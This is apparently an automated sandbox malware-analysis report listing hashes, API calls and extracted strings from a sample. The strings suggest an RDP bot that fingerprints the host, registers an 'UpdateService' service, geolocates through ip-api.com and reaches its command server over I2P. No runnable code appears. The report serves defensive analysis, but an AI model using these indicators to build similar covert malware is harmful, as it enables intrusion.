                                    • Instruction ID: 1a82f67c2631f1c1b7d68c82cab88009924ece0eea4062e52add690203f01454
                                    • Opcode Fuzzy Hash: c6fdafb6e61b9dcc75db4515785ec9ddd183118bff9fd0d5da33b544536fa653
                                    • Instruction Fuzzy Hash: B151E714E0F643CAFBB07754B490378A295AF18344FD605B2D94E462B2DF5DE9879332
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                    • String ID:
                                    • API String ID: 3714283218-0
                                    • Opcode ID: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
                                    • Instruction ID: b5bfd98776a629aacf83aad9fb312f072a560f5a0313ef7423434fbd47439650
                                    • Opcode Fuzzy Hash: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
                                    • Instruction Fuzzy Hash: 00516D25E0BA46C9FB61FB51E850279A3A4BF58B94F8684B5CD0D473B2DF3DE4428360
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: d743631cf24eda1d2df6e3a0731321b0b9a64b83d7173c1e462706517f616e59
                                    • Instruction ID: 443ea5245f852919e507c84450c86e15306b7b62a44d2ce79e19c172b9af7c58
                                    • Opcode Fuzzy Hash: d743631cf24eda1d2df6e3a0731321b0b9a64b83d7173c1e462706517f616e59
                                    • Instruction Fuzzy Hash: E11136E0A0C59791FA2A5B35EC506B81250BF177A4E501331E92DEA6F6DEDCAE5A8300

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: _errno$fclosefflushfopenfseekfwrite
                                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                    • API String ID: 2897271634-4120527733
                                    • Opcode ID: 2086d0b3fccbe90f8278429222fdf507b6fcba6ad0b34e4d164f706ff4c95eaf
                                    • Instruction ID: 4acbaace41dbcb4fa812371cbaededd15540e1bc3228b7d5d025c6d37d39a747
                                    • Opcode Fuzzy Hash: 2086d0b3fccbe90f8278429222fdf507b6fcba6ad0b34e4d164f706ff4c95eaf
                                    • Instruction Fuzzy Hash: 75D19E71A0BA03C2FA21FB54E8403B8A755BF60795FD646BAD90D472B0DE3CE5878320

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
                                    • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
                                    • API String ID: 3214881788-719614687
                                    • Opcode ID: dac36e3bd0cdf9df57b4b9ad19cad6874c2198d7d1dc801a52f0c0ee30f6488d
                                    • Instruction ID: d55cd1e62e0fa8e0353f31389e1f8702566d0255ed4d69138a54ae9834ca278f
                                    • Opcode Fuzzy Hash: dac36e3bd0cdf9df57b4b9ad19cad6874c2198d7d1dc801a52f0c0ee30f6488d
                                    • Instruction Fuzzy Hash: ADF1FAA0E0C78381FB625735EC8437D1256AF37365F2C07B6C52E262E9DE6EA9858341

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: ab038bee8234f97caf7f98465cb859aae6a65c5825cd4cb70bab40e8f46f15f3
                                    • Instruction ID: 98fa33b84cb37dc933a4c8883a39201de828f2e9f17d79c14e29ab87f1492e51
                                    • Opcode Fuzzy Hash: ab038bee8234f97caf7f98465cb859aae6a65c5825cd4cb70bab40e8f46f15f3
                                    • Instruction Fuzzy Hash: 86D14FA2F0C6D281FA228774EC543BC6361AF73B54F1D06F2C94D376A9DE2DA8458781

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: 46ca43fdad5aebfdff8ff7f637804f566179bbe5369bf1760046e13ede7a569f
                                    • Instruction ID: 0f6de6d236f2df9fca73f5cbfa74ca46114d82ea1df0c1797422bde06819aef3
                                    • Opcode Fuzzy Hash: 46ca43fdad5aebfdff8ff7f637804f566179bbe5369bf1760046e13ede7a569f
                                    • Instruction Fuzzy Hash: 1FD16AE2F0C6D781FB229B75EC403B96260AB47B50F15103AC94ED72B0DEEDAD848742

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: 8496e7bb406785b1ac4194d1313cb78f70ffddb51f70b2bc06b7f1d5756571b6
                                    • Instruction ID: c380f77c63e8d704fad53303612589eb1f04815ffa7fedeb80aeb59e70c89a82
                                    • Opcode Fuzzy Hash: 8496e7bb406785b1ac4194d1313cb78f70ffddb51f70b2bc06b7f1d5756571b6
                                    • Instruction Fuzzy Hash: 1CD16DA1E0C6D3D1FB329B35ED603B822A0AB4B754F150036D94ED76B9DEACEC448785

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: 1abb5038b05963b776529e4456fc73da6518fb59ef7b608b67d2e6a0660e025b
                                    • Instruction ID: deff1a18ad59c8b9543767c3585fbed7db0fe0bc3288fd7f1c018a3cf11f4247
                                    • Opcode Fuzzy Hash: 1abb5038b05963b776529e4456fc73da6518fb59ef7b608b67d2e6a0660e025b
                                    • Instruction Fuzzy Hash: FDD16DB9E1C6E681FB228F35EC893BCA250AF41754F1C01F6D9CD67A91DE2CE9458381

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: 2d6eb3587d012150d0035a763db43da1dea75cf5edb20fa8ee07f934ba88f8ca
                                    • Instruction ID: b44231a014dd756dc90a1d80690417c90c3a1b65a4131f3fdb06f856d1611e6b
                                    • Opcode Fuzzy Hash: 2d6eb3587d012150d0035a763db43da1dea75cf5edb20fa8ee07f934ba88f8ca
                                    • Instruction Fuzzy Hash: 4BD16CE2E0C6D381FA668B74EC503B92260AF67750F150132D94DD76B4DEECEE888741

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                    • API String ID: 3828489143-883582248
                                    • Opcode ID: f8fc02968b23630bcbc2ef19b2b22130ef80d4e74df1872f80140d4213a9ea3d
                                    • Instruction ID: d7f478b4b005f1d836a248c6bdc1042dc911f2e8fb5fac22c9cf41e93c994473
                                    • Opcode Fuzzy Hash: f8fc02968b23630bcbc2ef19b2b22130ef80d4e74df1872f80140d4213a9ea3d
                                    • Instruction Fuzzy Hash: 13D149E1E0CADB85FA639774EC803BD2290AF47B54F1C41B2D94E276E4DE2DE8458781

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                    • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                                    • API String ID: 3828489143-3798070276
                                    • Opcode ID: a57b692ad12e5eeb41306e7f3187960999aff03a888e3c7662513fb2fc337020
                                    • Instruction ID: 9ba5a621ffd9bae3baf2e56d183d676ea3adf6df110f94757833b3422ac9a61e
                                    • Opcode Fuzzy Hash: a57b692ad12e5eeb41306e7f3187960999aff03a888e3c7662513fb2fc337020
                                    • Instruction Fuzzy Hash: 5FD17971E0FA96C1FAA0BB54E4403B8E360AB20755FD711B6C94E176B0DE2DED868361

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$Referer$SYSTEM\CurrentControlSet\Services\UpdateService\Parameters$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$ip-api.com$last-patch$mem_alloc
                                    • API String ID: 0-4235120829
                                    • Opcode ID: f17b642b60684e6d72e5c52d8b8c935d337f4bcc8085869163eb07bfa546fddb
                                    • Instruction ID: 0e44860421cb8d0983171b35ae9d70cb1fd4ab03cacf3cec4b7331cb86366139
                                    • Opcode Fuzzy Hash: f17b642b60684e6d72e5c52d8b8c935d337f4bcc8085869163eb07bfa546fddb
                                    • Instruction Fuzzy Hash: B4127FA9A087C285EA628F34E8C83BD63A0EB44754F180276DADD677E5EF3CE545C700

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strlen$strcat$HandleLibraryLoadModule
                                    • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
                                    • API String ID: 1893813203-492052463
                                    • Opcode ID: 4fe1bcfedec6960b391f1dc07c002b4a6640761449cb7f7938ea02e167745d31
                                    • Instruction ID: ec461aa30ec3015ffebce42986dbe7e0f0d30b3931d3463017782849a5b7b927
                                    • Opcode Fuzzy Hash: 4fe1bcfedec6960b391f1dc07c002b4a6640761449cb7f7938ea02e167745d31
                                    • Instruction Fuzzy Hash: 157191B9A0CBC291EB229F25E8983EE6391AB85780F480171DACD6B799DF7CD505C740

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
